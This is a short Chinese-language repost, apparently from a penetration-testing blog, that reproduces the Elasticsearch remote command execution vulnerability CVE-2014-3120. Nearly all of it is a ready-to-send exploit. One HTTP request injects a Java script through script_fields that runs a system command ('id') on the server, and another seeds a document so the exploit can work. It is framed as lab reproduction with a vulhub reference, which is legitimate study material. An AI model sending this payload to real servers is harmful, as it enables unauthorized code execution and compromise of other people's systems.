ElasticSearch 命令執行漏洞（CVE-2014-3120）

本文轉載自查看原文 2019-08-14 08:53 945 滲透測試

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

該漏洞需要es中至少存在一條數據，若沒有,需要先創建一條數據

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

https://vulhub.org/#/environments/elasticsearch/CVE-2014-3120/

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 漏洞復現-ElasticSearch 命令執行漏洞（CVE-2014-3120） ElasticSearch 命令執行漏洞（CVE-2014-3120） ElasticSearch 遠程代碼執行漏洞(CVE-2014-3120) GNU Bash 遠程代碼執行漏洞(CVE-2014-6271) GNU Bash CVE-2014-6271不完整修復遠程代碼執行漏洞(CVE-2014-7169) Microsoft Secure Channel 遠程代碼執行漏洞(CVE-2014-6321)(MS14-066) Bash遠程代碼執行漏洞(CVE-2014-6271)案例分析心臟滴血漏洞（CVE-2014-0160） CVE-2020-11107：XAMPP任意命令執行漏洞復現 Couchdb 任意命令執行漏洞（CVE-2017-12636）